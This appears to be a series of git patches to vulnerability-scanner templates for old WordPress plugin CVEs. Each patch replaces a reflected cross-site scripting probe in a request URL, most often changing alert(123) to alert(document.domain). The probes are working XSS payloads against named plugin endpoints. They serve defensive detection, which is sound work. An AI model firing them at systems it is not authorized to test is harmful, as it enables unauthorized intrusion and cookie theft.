Chaddha Date: Mon, 19 Jul 2021 10:59:46 +0530 Subject: [PATCH 026/149] Update CVE-2011-5181.yaml --- cves/2011/CVE-2011-5181.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml index 41812c748a..c7e74be15b 100644 --- a/cves/2011/CVE-2011-5181.yaml +++ b/cves/2011/CVE-2011-5181.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 16d049098f46681c8b22c77bc3f52454bf68ede7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:00:15 +0530 Subject: [PATCH 027/149] Update CVE-2011-5265.yaml --- cves/2011/CVE-2011-5265.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml index 2ed7592d9e..5412865a18 100644 --- a/cves/2011/CVE-2011-5265.yaml +++ b/cves/2011/CVE-2011-5265.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From b4c91dc3c3f6c01eb8f924e859e5c9e8d715b159 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:00:43 +0530 Subject: [PATCH 028/149] Update CVE-2012-0901.yaml --- cves/2012/CVE-2012-0901.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml index fb82bdfed6..728c0ccd73 100644 --- a/cves/2012/CVE-2012-0901.yaml +++ b/cves/2012/CVE-2012-0901.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 41df1d813615e45ae870ecc0ce96462a881795a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:01:12 +0530 Subject: [PATCH 029/149] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 25c8832501..9bc5c08991 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' @@ -21,7 +21,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word From 6cd08e6f41377c7c353fd2254440fb5f4f3aad6d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:01:40 +0530 Subject: [PATCH 030/149] Update CVE-2012-2371.yaml --- cves/2012/CVE-2012-2371.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml index 61a2207ec3..b41122ff02 100644 --- a/cves/2012/CVE-2012-2371.yaml +++ b/cves/2012/CVE-2012-2371.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E' + - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 70bd4c64ede79ce1d13cffec423768859d142c5b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:02:53 +0530 Subject: [PATCH 031/149] Update CVE-2012-4242.yaml --- cves/2012/CVE-2012-4242.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index 791034edfe..d7ca7ac309 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 0fb255a462e320de9476c71900ca028d7e90ad82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:03:23 +0530 Subject: [PATCH 032/149] Update CVE-2012-4273.yaml --- cves/2012/CVE-2012-4273.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml index db31bfa338..99a6f52d88 100644 --- a/cves/2012/CVE-2012-4273.yaml +++ b/cves/2012/CVE-2012-4273.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 68e005d1a2ce521045be3e019d3e01e746231c6b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:03:46 +0530 Subject: [PATCH 033/149] Update CVE-2012-4768.yaml --- cves/2012/CVE-2012-4768.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml index e89963b08e..5c198776f4 100644 --- a/cves/2012/CVE-2012-4768.yaml +++ b/cves/2012/CVE-2012-4768.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 269d14b0bef33a5534308d47e6eb395104a1afd3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:05:03 +0530 Subject: [PATCH 034/149] Update CVE-2012-5913.yaml --- cves/2012/CVE-2012-5913.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml index be685d2507..cdbbce256d 100644 --- a/cves/2012/CVE-2012-5913.yaml +++ b/cves/2012/CVE-2012-5913.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E' + - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c8a1047ec1f2a21f0680fedd05647a2f6f9630e4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:05:25 +0530 Subject: [PATCH 035/149] Update CVE-2013-2287.yaml --- cves/2013/CVE-2013-2287.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 33a0b554e1..05ae7013e2 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 62617288d0d8d644b4fdc9d94f397b7ec1d95b35 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:05:55 +0530 Subject: [PATCH 036/149] Update CVE-2013-4117.yaml --- cves/2013/CVE-2013-4117.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml index f30a61b264..2b2a102326 100644 --- a/cves/2013/CVE-2013-4117.yaml +++ b/cves/2013/CVE-2013-4117.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 47adcf182adebfc8f065fea2d384224b1c165c00 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:06:19 +0530 Subject: [PATCH 037/149] Update CVE-2013-4625.yaml --- cves/2013/CVE-2013-4625.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml index 4b9f9136b6..e2184bc7a0 100644 --- a/cves/2013/CVE-2013-4625.yaml +++ b/cves/2013/CVE-2013-4625.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From ac74c798801cd98960ac30e1a029e026634e2360 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:10:50 +0530 Subject: [PATCH 038/149] Update CVE-2014-4513.yaml --- cves/2014/CVE-2014-4513.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml index dfcae28193..2661d56866 100644 --- a/cves/2014/CVE-2014-4513.yaml +++ b/cves/2014/CVE-2014-4513.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' + - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e694c5ed4f49764d8f006c5d045c9dc13d659b8e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:11:14 +0530 Subject: [PATCH 039/149] Update CVE-2016-1000128.yaml --- cves/2016/CVE-2016-1000128.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index 83fc34ed8d..b3dea4bf0d 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From fbf13672bac3a27a131589f085d5dba9fe2c4d44 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:11:45 +0530 Subject: [PATCH 040/149] Update CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index d76c910dcf..9b0f14449b 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From ce8bab80f963c1f4cd7bb03ce0b8b189a749690a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:12:07 +0530 Subject: [PATCH 041/149] Update CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 36392e35d4..18141078b1 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 62c3971816a3a0c856c5c8b22693338de71018e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:12:30 +0530 Subject: [PATCH 042/149] Update CVE-2016-1000131.yaml --- cves/2016/CVE-2016-1000131.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index 1e540169b2..a9c8dcbf8d 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 1790dd8fc268ef01693f49ec139c096319e11cde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:12:58 +0530 Subject: [PATCH 043/149] Update CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index e72ea63c7b..fa9404875a 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported" + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From d74ebd67d7b9dfad7f09a7acde68afc9ad87372a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:13:30 +0530 Subject: [PATCH 044/149] Update CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 658b8562e7..48e7531114 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C" + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e6f51e19ebabcc2896a9e08562348b78c1c949e4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:13:59 +0530 Subject: [PATCH 045/149] Update CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 1f35214f3d..99d42687c9 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From a81d23491b4f16b026d86a648e567639ec8624b1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:14:30 +0530 Subject: [PATCH 046/149] Update CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index ba16e3c957..48480b29c5 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From b47cf72dd00e864e5a91ef90cb8311ac71db916e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:15:08 +0530 Subject: [PATCH 047/149] Update CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 3d321b4c8f..8dab040905 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From df69924f5b3bf1865433434fa7fcef0fc8c1e664 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:15:37 +0530 Subject: [PATCH 048/149] Update CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index ecf71fafc7..9bc3b473c3 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -13,7 +13,7 @@ info: requests: - method: POST path: - - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1" body: "amty_hidden=1" @@ -21,7 +21,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word From 63765c5693a777bd2aa30ff79ebfee5878b3b39d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:29:23 +0530 Subject: [PATCH 049/149] Update CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index 40a4e59745..9a2c3bce2f 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word From 70b1ba08d62e8729f132b3c9ea0a918464d13be6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:29:58 +0530 Subject: [PATCH 050/149] Update CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index 5ac65f849b..7bed4c11c3 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From cfd72afbc546fb9792cc2d0da3a8a5111343e007 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:30:44 +0530 Subject: [PATCH 051/149] Update CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index 19bdc03839..da92a85868 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 1453b08a1d1d620d551fb06db34ac27eab24901e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:31:16 +0530 Subject: [PATCH 052/149] Update CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index 4f305a6330..b71a5826b6 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5923b1522e3463c27b0119b3cdb6b12edef3b56e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:31:57 +0530 Subject: [PATCH 053/149] Update CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index 79a0cbd39f..a7af37791e 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From fee3b0dbba129ef0fc067263b110e7ae6143a193 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:32:30 +0530 Subject: [PATCH 054/149] Update CVE-2018-5316.yaml --- cves/2018/CVE-2018-5316.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml index 7553a25625..13f88cb96b 100644 --- a/cves/2018/CVE-2018-5316.yaml +++ b/cves/2018/CVE-2018-5316.yaml 